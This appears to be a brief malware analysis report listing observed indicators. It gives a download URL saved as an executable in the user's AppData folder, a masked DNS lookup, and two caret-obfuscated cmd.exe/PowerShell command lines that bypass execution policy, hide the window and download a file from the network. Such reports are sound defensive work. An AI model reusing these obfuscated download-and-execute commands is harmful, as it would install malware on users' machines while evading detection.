Technical Information
- http://www.fopeioaas.top/read.php?f=1.gif as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^O^w^ERS^HE^l^l.^eXe ^-^eX^E^cut^I^OnP^oLi^CY^ ^B^y^pass -NO^p^rO^f^I^lE ^-^w^I^Nd^owsTYLe hI^ddeN^ (NEw-objE^c^t SY^ste^M^.^neT.w^eB^CL^Ie^Nt).^DO^wnlo^adFi^L^E('http://www...
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /C "P^O^w^ERS^HE^l^l.^eXe ^-^eX^E^cut^I^OnP^oLi^CY^ ^B^y^pass -NO^p^rO^f^I^lE ^-^w^I^Nd^owsTYLe hI^ddeN^ (NEw-objE^c^t SY^ste^M^.^neT.w^eB^CL^Ie^Nt).^DO^wnlo^adFi^L^E('http://www...' (with hidden window)